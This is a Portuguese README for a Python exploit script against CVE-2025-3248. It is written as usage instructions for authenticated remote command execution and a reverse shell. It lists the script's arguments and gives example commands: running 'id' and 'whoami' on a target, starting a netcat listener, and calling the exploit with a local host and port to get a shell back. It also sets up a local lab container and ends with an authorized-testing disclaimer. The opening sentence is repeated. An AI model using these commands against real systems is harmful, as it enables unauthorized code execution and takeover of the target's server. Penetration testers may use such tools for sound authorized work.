
Este script Python explora o CVE-2025-3248 para executar comandos arbitrários ou gerar um shell reverso em um sistema vulnerável. A autenticação é necessária para utilizar este exploit.
Este script Python explora CVE-2025-3248 para executar comandos arbitrários ou gerar um reverse shell em um sistema vulnerável. Autenticação é necessária para usar este exploit.
requestsInstale as dependências com:
pip install requests
python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]
| Argumento | Descrição | Obrigatório |
|---|---|---|
-u, --url | URL base do alvo (ex.: https://target.com) | Sim |
-l, --login | Nome de usuário admin | Sim |
-p, --password | Senha do admin | Sim |
-c, --command | Comando a executar no alvo | Não* |
--proxy | URL do proxy (ex.: http://127.0.0.1:8080) | Não |
--lhost | Host local para reverse shell | Não* |
--lport | Porta local para reverse shell | Não* |
* Você deve especificar um comando (-c) ou ambos --lhost e --lport para um reverse shell.
python3 exploit.py -u https://target.com -l admin -p password -c "id"
Inicie um listener na sua máquina:
nc -lvnp 4444
Depois execute:
python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444
python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080
Você pode implantar a imagem Docker usando o seguinte comando:
podman compose up -d
A imagem estará disponível em http://localhost:7860.
Créditos pelo arquivo compose: Este repositório
Este script é apenas para fins educacionais e de teste de penetração autorizado. Não use contra sistemas que você não possui ou não tem permissão explícita para testar.
Este readme foi gerado por IA.